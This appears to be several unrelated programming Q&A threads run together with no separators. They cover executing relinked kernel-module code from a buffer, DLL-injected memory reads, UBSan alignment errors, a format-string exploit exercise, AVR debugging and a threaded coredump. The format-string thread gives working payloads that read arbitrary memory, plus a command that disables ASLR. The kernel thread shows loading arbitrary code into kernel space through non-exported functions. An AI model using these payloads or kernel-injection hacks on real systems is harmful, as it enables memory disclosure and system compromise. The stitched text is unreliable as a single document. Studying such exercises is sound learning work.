tl;dr: I'm trying to dynamically execute code taken from another binary, but I am stuck on handling memory references (e.g. mov $0x40200b, %rdi). Can I patch my code, or the code that runs the snippet, so that 0x40200b is resolved correctly (as offset 0x200b from the start of the code)?
To generate the code to be executed dynamically, I start from a kernel object (.ko) and resolve its undefined references using ld.
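#!/usr/bin/python
import os, subprocess

if os.geteuid() != 0:
    print('Run this as root')
    exit(-1)

# Addresses of all kernel symbols (only meaningful when read as root)
with open("/proc/kallsyms", "r") as f:
    out = f.read()

# Undefined symbols of the module, one per line in POSIX format
nm = subprocess.Popen(['nm', 'ebbchar.ko', '-u', '--demangle', '-fposix'],
                      stdout=subprocess.PIPE, universal_newlines=True)
v = ''
for line in nm.stdout:
    s = " " + line.split()[0] + "\n"
    off = out.find(s)
    # A kallsyms line is "<16 hex digits> <type> <name>"
    v += "--defsym " + s.strip() + "=0x" + out[off-18:off-2] + " "
print(v)
os.system("ld ebbchar.ko " + v + "-o ebbchar.bin")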
I then pass the code to be executed to the kernel through an mmapped file:
int fd = open(argv[1], O_RDWR | O_SYNC);
address1 = mmap(NULL, page_size, PROT_WRITE|PROT_READ , MAP_SHARED, fd, 0);
int in=open(argv[2],O_RDONLY);
sz= read(in, buf+8,BUFFER_SIZE-8);
uint64_t entrypoint=atol(argv[3]);
*((uint64_t*)buf)=entrypoint;
write(fd, buf, min(sz+8, (size_t) BUFFER_SIZE));
In the kernel, I execute the code dynamically like this:
struct mmap_info *info;
copy_from_user((void*)(&info->offset),buf,8);
copy_from_user(info->data, buf+8, sz-8);
unsigned long (*func)(void);
func = (void *)(info->data + info->offset);
int ret= func();
This approach works for code that doesn't reference any absolute address, such as "\x55\x48\x89\xe5\xc7\x45\xf8\x02\x00\x00\x00\xc7\x45\xfc\x03\x00\x00\x00\x8b\x55\xf8\x8b\x45\xfc\x01\xd0\x5d\xc3", but I have problems as soon as data or external symbols are involved.
See example below.
Let's assume I want to dynamically execute the function vm_close. objdump -d -S returns:
0000000000401017 <vm_close>:
{
401017: e8 e4 07 40 81 callq ffffffff81801800 <__fentry__>
printk(KERN_INFO "vm_close");
40101c: 48 c7 c7 0b 20 40 00 mov $0x40200b,%rdi
401023: e9 b6 63 ce 80 jmpq ffffffff810e73de <printk>
At execution, my function pointer points to the right code:
(gdb) x/12x $rip
0xffffc90000c0601c: 0x48 0xc7 0xc7 0x0b 0x20 0x40 0x00 0xe9
0xffffc90000c06024: 0xb6 0x63 0xce 0x80
(gdb) x/2i $rip
=> 0xffffc90000c0601c: mov $0x40200b,%rdi
0xffffc90000c06023: jmpq 0xffffc8ff818ec3de
But this code will fail because:
1) In my context, $0x40200b is used as the absolute address 0x40200b, not as offset 0x200b from the beginning of the code.
2) I don't understand why, but the jump target displayed there differs from the correct one (0xffffc8ff818ec3de != 0xffffffff810e73de), so it won't reach my symbol and will crash.
Is there a way to solve my 2 issues?
Also, I had trouble finding good documentation related to my issue (low-level address resolution); if you could point me to some, that would really help.
Edit: Since I run the code in the kernel, I cannot simply compile it with -fPIC or -fpie, which gcc rejects (cc1: error: code model kernel does not support PIC mode).
Edit 24/09:
Following @Peter Cordes' comment, I recompiled the module after adding -mcmodel=small -fpie -mno-red-zone -mno-sse to the Makefile (/lib/modules/$(uname -r)fixed/build/Makefile).
This is better than the original version, since the generated code before linking is now:
0000000000000018 <vm_close>:
{
18: ff 15 00 00 00 00 callq *0x0(%rip) # 1e <vm_close+0x6>
printk(KERN_INFO "vm_close");
1e: 48 8d 3d 00 00 00 00 lea 0x0(%rip),%rdi # 25 <vm_close+0xd>
25: e8 00 00 00 00 callq 2a <vm_close+0x12>
}
2a: c3 retq
So, thanks to RIP-relative addressing, after linking I can successfully access the variables embedded within the buffer:
40101e: 48 8d 3d e6 0f 00 00 lea 0xfe6(%rip),%rdi # 40200b
Still, one problem remains:
The symbol I want to access (printk) and my executable buffer are in different regions of the address space, for example:
printk=0xffffffff810e73de:
Executable_buffer=0xffffc9000099d000
But in my callq to printk, I only have 32 bits to encode the target as an offset from $rip, since there is no .got section in the kernel. This means that printk has to be located within [$rip - 2 GB, $rip + 2 GB], which is not the case here.
Is there a way to reach printk even though it is located more than 2 GB away from my buffer, for instance by changing gcc options so that the binary actually has a .got section? (I tried -mcmodel=medium, but I haven't seen any difference in the generated code.)
Or is there a reliable way to force my executable buffer, which is potentially too large for kmalloc, to be allocated in the [0xffffffff00000000 ; 0xffffffffffffffff] range? (I currently use __vmalloc(BUFFER_SIZE, GFP_KERNEL, PAGE_KERNEL_EXEC);)
Edit 27/09:
I succeeded in allocating my buffer in the [0xffffffff00000000 ; 0xffffffffffffffff] range by using the non-exported __vmalloc_node_range function as a (dirty) hack.
IMPORTED(__vmalloc_node_range)(BUFFER_SIZE, MODULE_ALIGN,
MODULES_VADDR + get_module_load_offset(),
MODULES_END, GFP_KERNEL,
PAGE_KERNEL_EXEC, 0, NUMA_NO_NODE,
__builtin_return_address(0));
Then, once I know the address of my executable buffer and the addresses of the kernel symbols (by parsing /proc/kallsyms), I can patch my binary using ld's option --defsym symbol=relative_address, where relative_address = symbol_address - buffer_offset.
Despite being extremely dirty, this approach actually works.
But I need to relink my binary each time I execute it, since the buffer may (and will) be allocated at a different address. To solve this, I think the best way would be to build my executable as a real position-independent executable, so that I can just patch the global offset table instead of fully relinking the module.
But with the options given above I get RIP-relative addressing but no GOT/PLT. So I'd like to find a way to build my module as a proper PIE.
This post is getting huge, messy and we are deviating from the original question. Thus, I opened a new simplified post there. If I get interesting answers, I'll edit this post to explain them.
Note: For the sake of simplicity, safety checks are not shown here.
Note 2: I am perfectly aware that my PoC is very unusual and can be a bad practice but I'd like to do it anyway.
I'm working on my reversing skill set here, and I came upon something I thought I understood but managed to confuse myself with.
I'm working mainly in C.
My function returns the address of the information I want to access.
LRESULT ret = SendMessage(hComboBox, CB_GETITEMDATA, (WPARAM)0 , (LPARAM) 0);
// the exact function doesn't really matter here.
printf("Address: %p\n", (void *)ret); // Output is 09437DF8
A dump of this address results in
09437DF8 A0 55 E8 12
This is the address (note endianness) of the data I really want to read.
12e855A0
12 E8 55 A0 - 30 00 3A 00 30 00 33 00 3A 00 32 00 32 00 00 00 - UNICODE "0:03:22"
Now I'm fairly certain this is just basic pointers/referencing/dereferencing, but I can't wrap my head around what I have to do to read this value programmatically.
wprintf(L"%s\n", <value at address pointed to by ret>);
// Yes, it's a null-terminated string
// I'm working via an injected DLL, so no access violations
// string is unicode
Perhaps something like this?
#include <stdio.h>
#include <wchar.h>
int main()
{
wchar_t *name = L"UNICODE String";
void **ret = (void **)&name;
wprintf(L"%ls \n", *(wchar_t **)ret);
return 0;
}
I've been running some code under UBSan, and found an error which I've never seen before:
/usr/include/c++/7/bits/stl_algobase.h:324:8: runtime error: store to misaligned address 0x611000001383 for type 'struct complex', which requires 4 byte alignment
0x611000001383: note: pointer points here
66 46 40 02 00 00 00 00 00 00 00 00 04 01 18 00 08 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00
^
(g++-7.3.0, Ubuntu 18.04, flags -fsanitize=address -fsanitize=undefined)
What does this error mean? Is it truly an error (it is in the standard library, so it can't be too bad, right?), and should I care about it?
You probably use a pointer cast which casts a block of raw memory to a complex*.
Example:
void* raw = getBuffer(); // Made up function which returns a buffer
auto size = *static_cast<uint16_t*>(raw); // Maybe your format says that you got a 2-byte size in front
auto* array = reinterpret_cast<complex*>(static_cast<char*>(raw) + sizeof(uint16_t)); // ... and complex numbers after
std::transform(array, array+size, ...); // Pass this into STL
Boom! You got UB.
Why?
The behavior is undefined in the following circumstances: [...]
Conversion between two pointer types produces a result that is incorrectly aligned
[...]
If the resulting pointer is not correctly aligned [68] for the referenced type, the behavior is undefined.
See https://stackoverflow.com/a/46790815/1930508 (where I got these from)
What does it mean?
Every pointer must be aligned as its pointed-to type requires. For complex this means an alignment of 4. In short, the address in array (from above) must be evenly divisible by 4 (i.e. array % 4 == 0). Assuming that raw is aligned to 4 bytes, you can easily see that array cannot be: (raw + 2) % 4 == 2 (because raw % 4 == 0).
If the size were a 4-byte value, then array would be aligned if (and only if) raw was aligned. Whether this is guaranteed depends on where it comes from.
So yes, this is truly an error and may lead to a real bug, although not always (depending on moon phase etc., as always with UB; see the answer above for details).
And no, it is NOT in the STL; it just happens to be detected there because UBSan checks memory accesses. So while the actual UB is the pointer cast to complex*, it is only detected when that pointer is read from or written through.
You can use export UBSAN_OPTIONS=print_stacktrace=1 prior to executing the program to get a stacktrace and find out where your wrong cast is.
Tip: You only need to check casts. Any struct/type allocated via new is always aligned (and every member inside), unless tricks like "packed structs" are used.
I'm trying to exploit a format string vulnerability just for exercise but something is going wrong. My goal is to exploit such a bug in order to read from a certain address chosen by me.
This is the code I'm trying to exploit:
#include <stdio.h>
void main(int argc, char *argv[]){
printf(argv[1]);
}
This program is running on an x86 machine with a 2.6.20 Linux kernel.
I'm trying to print the bytes stored at the address 0x80483cb, which belongs to the code section:
...
80483cb: e8 e8 fe ff ff call 80482b8 <printf@plt>
80483d0: 83 c4 10 add $0x10,%esp
80483d3: b8 00 00 00 00 mov $0x0,%eax
...
Just to be sure, I've also disabled ASLR with:
echo 0 > /proc/sys/kernel/randomize_va_space
I found the position of my input on the stack (i.e. where to place the memory address) with:
./print AAAA`perl -e 'print "%08x."x141'`
AAAA00000000.bffff0a8.080483fb.b7fcaffc.b7fcaffc.080494e8.b7fcaffc.00000000.b8000ce0.
bffff108.b7eb4e14.00000002.bffff134.bffff140.b7ff5b6c.b7fcaffc.00000000.bffff0c0.bffff108.
bffff0b0.b7eb4dd2.00000000.00000000.00000000.b8000ff8.00000002.080482d0.00000000.b7ff5aa0.
b7ff66b0.b8000ff8.00000002.080482d0.00000000.080482f1.080483a4.00000002.bffff134.080483e0.
08048440.b7ff66b0.bffff12c.b7ffee8e.00000002.bffff2ac.bffff2b4.00000000.bffff57a.bffff5dd.
bffff5f1.bffff5f8.bffff605.bffff615.bffff620.bffff674.bffff6bb.bffff6db.bffff6ef.bffff701.
bffff711.bffff729.bffff749.bffff761.bffff777.bffff781.bffffc71.bffffc7f.bffffc8f.bffffcbc.
bffffce7.bffffd08.bffffd33.bffffd41.bffffd5b.bffffe56.bffffe8b.bffffea0.bffffeba.bffffed2.
bfffff0a.bfffff11.bfffff19.bfffff24.bfffff3a.bfffff5f.bfffff67.bfffff74.bfffff82.bfffff9e.
bfffffb7.bfffffc2.bfffffcd.bfffffea.00000000.00000020.b7fe9400.00000021.b7fe9000.00000010.
078bfbff.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.
00000007.00000007.b7fea000.00000008.00000000.00000009.080482d0.0000000b.00000000.0000000c.
00000000.0000000d.00000000.0000000e.00000000.00000017.00000000.0000000f.bffff29b.00000000.
00000000.00000000.00000000.00000000.69000000.00363836.00000000.00000000.00000000.72702f2e.
00746e69.41414141.
Finally, I tried to print the bytes at that address with:
./print $(printf "\xcb\x83\x04\x08")`perl -e 'print "%08x."x140 . "%s"'`
But I get a segmentation fault before I can see those bytes:
00000000.bffff0a8.080483fb.b7fcaffc.b7fcaffc.080494e8.b7fcaffc.00000000.b8000ce0.bffff108.
b7eb4e14.00000002.bffff134.bffff140.b7ff5b6c.b7fcaffc.00000000.bffff0c0.bffff108.bffff0b0.
b7eb4dd2.00000000.00000000.00000000.b8000ff8.00000002.080482d0.00000000.b7ff5aa0.b7ff66b0.
b8000ff8.00000002.080482d0.00000000.080482f1.080483a4.00000002.bffff134.080483e0.08048440.
b7ff66b0.bffff12c.b7ffee8e.00000002.bffff2af.bffff2b7.00000000.bffff57a.bffff5dd.bffff5f1.
bffff5f8.bffff605.bffff615.bffff620.bffff674.bffff6bb.bffff6db.bffff6ef.bffff701.bffff711.
bffff729.bffff749.bffff761.bffff777.bffff781.bffffc71.bffffc7f.bffffc8f.bffffcbc.bffffce7.
bffffd08.bffffd33.bffffd41.bffffd5b.bffffe56.bffffe8b.bffffea0.bffffeba.bffffed2.bfffff0a.
bfffff11.bfffff19.bfffff24.bfffff3a.bfffff5f.bfffff67.bfffff74.bfffff82.bfffff9e.bfffffb7.
bfffffc2.bfffffcd.bfffffea.00000000.00000020.b7fe9400.00000021.b7fe9000.00000010.078bfbff.
00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.
00000007.b7fea000.00000008.000Segmentationfault
What I expected was to see the bytes starting at the chosen address, up to the first \x00, printed as characters. What am I doing wrong?
This would work if you didn't change the length of your argument.
You remove one %08x. and add one %s. This makes your input 3 bytes shorter, effectively changing the stack layout. So you are likely not hitting the right address anymore.
I recommend writing a small script that will always pad your string to a fixed size. This helps to avoid such changes.
Keep in mind that changing your environment ($PWD (cd ..), adding/removing environment variables, etc.) will also change the stack layout. Resetting the environment can be of help here (env -i).
Here is a run of the vuln program without changing the length of the argument:
$ ./nagga $(printf "\x41\x41\x41\x41")XX`perl -e 'print "%x."x118 . "%x"'`
AAAAXX0.8048409.f7fceff4.8048400.0.0.f7e454b3.2.ffffd6b4.ffffd6c0.f7fd3000.0.ffffd61c.ffffd6c0.0.804821c.f7fceff4.0.0.0.c1a6169f.f6a2b28f.0.0.0.2.8048330.0.f7ff0a90.f7e453c9.f7ffcff4.2.8048330.0.8048351.80483e4.2.ffffd6b4.8048400.8048470.f7feb660.ffffd6ac.f7ffd918.2.ffffd7d4.ffffd7dc.0.ffffd947.ffffd952.ffffd962.ffffd984.ffffd997.ffffd9a1.ffffdec2.ffffded6.ffffdf23.ffffdf2d.ffffdf3e.ffffdf46.ffffdf51.ffffdf63.ffffdf70.ffffdfa4.ffffdfc4.ffffdfe6.0.20.f7fdb420.21.f7fdb000.10.78bfbff.6.1000.11.64.3.8048034.4.20.5.9.7.f7fdc000.8.0.9.8048330.b.0.c.0.d.0.e.0.17.0.19.ffffd7bb.1f.ffffdff0.f.ffffd7cb.0.0.0.0.0.f4000000.2b137f67.69b01f05.93944d19.697a2611.363836.0.616e2f2e.616767.41414141
$ ./nagga $(printf "\x70\x84\x04\x08")XX`perl -e 'print "%x."x118 . "%s"'`
p�XX0.8048409.f7fceff4.8048400.0.0.f7e454b3.2.ffffd6b4.ffffd6c0.f7fd3000.0.ffffd61c.ffffd6c0.0.804821c.f7fceff4.0.0.0.187cff94.2f785b84.0.0.0.2.8048330.0.f7ff0a90.f7e453c9.f7ffcff4.2.8048330.0.8048351.80483e4.2.ffffd6b4.8048400.8048470.f7feb660.ffffd6ac.f7ffd918.2.ffffd7d4.ffffd7dc.0.ffffd947.ffffd952.ffffd962.ffffd984.ffffd997.ffffd9a1.ffffdec2.ffffded6.ffffdf23.ffffdf2d.ffffdf3e.ffffdf46.ffffdf51.ffffdf63.ffffdf70.ffffdfa4.ffffdfc4.ffffdfe6.0.20.f7fdb420.21.f7fdb000.10.78bfbff.6.1000.11.64.3.8048034.4.20.5.9.7.f7fdc000.8.0.9.8048330.b.0.c.0.d.0.e.0.17.0.19.ffffd7bb.1f.ffffdff0.f.ffffd7cb.0.0.0.0.0.f000000.5f19366a.9135f3e8.e60e0ac6.69afc87d.363836.0.616e2f2e.616767.�Ë$Ð���������U��S�������t��f����Ћ���u���[]Ð�S��r
Works as expected.
I am writing a callback function in C. It is intended to initialise an I2C sensor, and it is called at the conclusion of each (split-phase) configuration step; after the 9th call, the device is almost ready to use.
The basic idea of the function is this:
void callback(void)
{
static uint8_t calls = 0;
if (++calls == 9) {
// Finalise device setup (literally a single line of code)
}
}
My problem is that the above if statement is never being entered, despite the function being called 9 times.
The (dis)assembly code for my function seems sane (with the exception of the subi . 0xFF trick for an increment, despite the inclusion of an inc instruction):
00000a4c <callback>:
a4c: 80 91 9e 02 lds r24, 0x029E
a50: 8f 5f subi r24, 0xFF ; 255
a52: 80 93 9e 02 sts 0x029E, r24
a56: 89 30 cpi r24, 0x09 ; 9
a58: 09 f0 breq .+2 ; 0xa5c <callback+0x10>
a5a: 08 95 ret
a5c: 2e e1 ldi r18, 0x1E ; 30
a5e: 35 e0 ldi r19, 0x05 ; 5
a60: 41 e0 ldi r20, 0x01 ; 1
a62: 60 e0 ldi r22, 0x00 ; 0
a64: 84 e7 ldi r24, 0x74 ; 116
a66: 0c 94 c7 02 jmp 0x58e ; 0x58e <twi_set_register>
I am writing the code for an Atmel AVR chip, and thus compiling with avr-gcc. I have no meaningful code debugging capabilities (I don't have access to a JTAG programmer, and the function is asynchronous/split-phase in any case; USART printing is too slow).
However, I have access to a logic analyser, and have been able to determine a number of things by placing while (1) ; statements inside the code:
the function is called - if I place an infinite loop at the start of the function, the microcontroller hangs
the function should be called 9 times - the trigger for the function is an I2C communication, and in the previous step it hangs immediately after the first communication; I can observe 9 complete and valid I2C communications
calls is incremented within the function - if I add if (calls == 0) { while (1) ; } after the increment, it does not hang
calls is never non-zero at the start of the function - if I add if (calls) { while(1) ; } before the increment, it does not hang
I'm completely at a loss for ideas.
Does anyone have any suggestions as to what could cause this, or even for new debugging steps I could take?
I ended up finding the cause of the error; another subsystem was breaking as a side-effect of the first call to the callback function, meaning that no other calls succeeded.
This explains the behaviours I saw:
it hung the first time because it was actually being called
it didn't hang the second time (or any future time) because it was only being called once
the I2C transactions I was observing were occurring, but their callback mechanism was not operating correctly, due to the other subsystem (tasks) breaking
I was able to work this out by using a few GPIO pins as debugging toggles, and thus tracking how the call was progressing through the TWI interface.
Thanks for the help guys. This isn't really an answer to the original question as posed, but it is solved, so that's something :)
From what you say, I can only think of three possibilities: 1) your assumption that the function is being called on every I2C communication is incorrect; 2) your program has a bug in some unrelated function (for example an out-of-bounds write) which corrupts the variable calls; or 3) two or more threads are calling your function simultaneously and calls is being incremented in a different way than you expect. For the last case, use > instead of ==; if this solves the problem, then you are running in a multi-threaded environment without knowing it.
You need an accurate method to know the exact value of calls. If you have neither a debugger nor the means to output text, the only thing you have left to play with is time. I don't know your compiler, but I am sure it provides some useful timing functions, so what I would do is delay for 10+calls seconds before the increment and again for 10+calls seconds after it, for example:
sleep(1000*(10+calls));
++calls;
sleep(1000*(10+calls));
if(calls>8){
// your actual code
}
I would (chronometer in hand) expect a delay of (10+0 plus 10+1) = 21 seconds on the first call, 23 seconds on the second call, 25 in the third and so on. That way I could be sure the value of calls started with 0 and then it was progressively increased until 9.
Also, you must test for what you expect, not for what you don't expect. So instead of doing this:
++calls;
if (calls==0) while (1);
do this:
++calls;
if (calls==1) while (1);
That way, if your program hangs, you can be sure the value of calls is exactly 1, and not just anything different from zero. If you count one valid I2C communication and your program hangs, then the transition from 0 to 1 was done correctly, so change the hang statement accordingly:
++calls;
if (calls==2) while (1);
Again, if you count 2 valid I2C communications before your program hangs that means that the transition from 1 to 2 was correct, and so on.
Another suggestion, try this:
uint8_t Times(void){
static uint8_t calls = 0;
return ++calls;
}
void callback(void){
if (Times()>8) {
// Your actual code
}
}
And this:
void callback(void){
static uint8_t calls = 0;
if (calls++>7) {
// some code.
}
}
Hope this helps.
Backtrace of the coredump:
#0 0x0000000000416228 in add_to_epoll (struct_fd=0x18d32760, lno=7901) at lbi.c:7092
#1 0x0000000000418b54 in connect_fc (struct_fd=0x18d32760, type=2) at lbi.c:7901
#2 0x0000000000418660 in poll_fc (arg=0x0) at lbi.c:7686
#3 0x00000030926064a7 in start_thread () from /lib64/libpthread.so.0
#4 0x0000003091ed3c2d in clone () from /lib64/libc.so.6
Code Snippet:
#define unExp(x) __builtin_expect((x),0)
...
7087 int add_to_epoll( struct fdStruct * struct_fd, int lno)
7088 {
7089 struct epoll_event ev;
7090 ev.events = EPOLLIN | EPOLLET | EPOLLPRI | EPOLLERR ;
7091 ev.data.fd = fd_st->fd;
7092 if (unExp(epoll_ctl(struct_fd->Hdr->info->epollfd, EPOLL_CTL_ADD, struct_fd->fd,&ev) == -1))
7093 {
7094 perror("client FD ADD to epoll error:");
7095 return -1;
7096 }
7097 else
7098 {
...
7109 }
7110 return 1;
7111 }
Disassembly of the offending line. I am not good at interpreting assembly code, but I have tried my best:
if (unExp(epoll_ctl(struct_fd->Hdr->info->epollfd, EPOLL_CTL_ADD, stuct_fd->fd,&ev) == -1))
416210: 48 8b 45 d8 mov 0xffffffffffffffd8(%rbp),%rax // Storing struct_fd->fd
416214: 8b 10 mov (%rax),%edx // to EDX
416216: 48 8b 45 d8 mov 0xffffffffffffffd8(%rbp),%rax // Storing struct_fd->Hdr->info->epollfd
41621a: 48 8b 80 e8 01 00 00 mov 0x1e8(%rax),%rax // to EDI which failed
416221: 48 8b 80 58 01 00 00 mov 0x158(%rax),%rax // while trying to offset members of the structure
416228: 8b 78 5c mov 0x5c(%rax),%edi // <--- failed here since Reg AX is 0x0
41622b: 48 8d 4d e0 lea 0xffffffffffffffe0(%rbp),%rcx
41622f: be 01 00 00 00 mov $0x1,%esi
416234: e8 b7 e1 fe ff callq 4043f0 <epoll_ctl@plt>
416239: 83 f8 ff cmp $0xffffffffffffffff,%eax
41623c: 0f 94 c0 sete %al
41623f: 0f b6 c0 movzbl %al,%eax
416242: 48 85 c0 test %rax,%rax
416245: 74 5e je 4162a5 <add_to_epoll+0xc9>
Printing out Registers and struct member values:
(gdb) i r $rax
rax 0x0 0
(gdb) p struct_fd
$3 = (struct fdStruct *) 0x18d32760
(gdb) p struct_fd->Hdr
$4 = (StHdr *) 0x3b990f30
(gdb) p struct_fd->Hdr->info
$5 = (struct Info *) 0x3b95b410 // Strangely, this is NOT NULL. Inconsistent with assembly dump.
(gdb) p ev
$6 = {events = 2147483659, data = {ptr = 0x573dc648000003d6, fd = 982, u32 = 982, u64= 6286398667419026390}}
Please let me know if my interpretation of the disassembly is OK. If it is, I would like to understand why gdb does not show NULL when printing the structure members.
Or, if the analysis is wrong, I would like to know the actual reason for the coredump. Please let me know if you need more info.
Thanks
---- The following part was added later ----
The proxy is a multithreaded program. After more digging, I found that when the problem occurs, the following two threads are running in parallel. When I prevent the two functions from running in parallel, the problem never occurs. However, I cannot explain how this behaviour results in the crash described above:
Thread 1:
------------------------------------------------------------
int new_connection() {
...
struct_fd->Hdr->info=NULL; /* (line 1) */
...
<some code>
...
struct_fd->Hdr->info=Golbal_InFo_Ptr; /* (line 2) */ // This is a malloced memory, once allocated never freed
...
...
}
------------------------------------------------------------
Thread 2 executing add_to_epoll():
------------------------------------------------------------
int add_to_epoll( struct fdStruct * struct_fd, int lno)
{
...
if (unExp(epoll_ctl(struct_fd->Hdr->info->epollfd,...) /* (line 3) */
...
}
------------------------------------------------------------
In the above snippets if execution is done in the order,
Line 1,
Line 3,
Line 2,
the scene can occur. What I expect is whenever an illegal reference is encountered it should dump immediately without trying to execute LINE 3 which makes it NON NULL.
It is a reproducible behavior: so far I have got around 12 coredumps of the same problem, all showing exactly the same thing.
It is clear that struct_fd->Hdr->info is NULL, as Per Johansson already answered.
However, GDB thinks that it is not. How could that be?
One common way this happens is when you change the layout of struct fdStruct, struct StHdr (or both), and neglect to rebuild all objects that use these definitions.
The disassembly shows that offsetof(struct fdStruct, Hdr) == 0x1e8 and offsetof(struct StHdr, info) == 0x158. See what GDB prints for the following:
(gdb) print/x (char*)&struct_fd->Hdr - (char*)struct_fd
(gdb) print/x (char*)&struct_fd->Hdr->info - (char*)struct_fd->Hdr
I bet it would print something other than 0x1e8 and 0x158.
If that's the case, make clean && make may fix the problem.
Update:
(gdb) print/x (char*)&struct_fd->Hdr - (char*)struct_fd
$1 = 0x1e8
(gdb) print/x (char*)&struct_fd->Hdr->info - (char*)struct_fd->Hdr
$3 = 0x158
This proves that GDB's idea of how objects are laid out in memory matches compiled code.
We still don't know whether GDB's idea of the value of struct_fd matches reality. What do these commands print?
(gdb) print struct_fd
(gdb) x/gx $rbp-40
They should produce the same value (0x18d32760). Assuming they do, the only other explanation I can think of is that you have multiple threads accessing struct_fd, and the other thread overwrites the value that used to be NULL with the new value.
I just noticed your update to the question ;-)
What I expect is whenever an illegal reference is encountered it should dump immediately without trying to execute LINE 3 which makes it NON NULL.
Your expectation is incorrect: any modern CPU has multiple cores, and your threads are executing simultaneously. That is, you have this code (time goes down along the Y axis):
char *p; // global
Time   CPU0          CPU1
0      p = NULL
1      if (*p)       p = malloc(1)
2                    *p = 'a';
...
At T1, CPU0 traps into the OS, but CPU1 continues. Eventually, the OS processes hardware trap, and dumps memory state at that time. On CPU1, hundreds of instructions may have executed after T1. The clocks between CPU0 and CPU1 aren't even synchronized, they don't necessarily go in lock-step.
Moral of the story: don't access global variables from multiple threads without proper locking.
The C line part of the disassembly does not match the one in the original code. But clearly
struct_fd->Hdr->info
is NULL. gdb shouldn't have a problem printing that, but it does sometimes get confused when the code is compiled with -O2 or higher.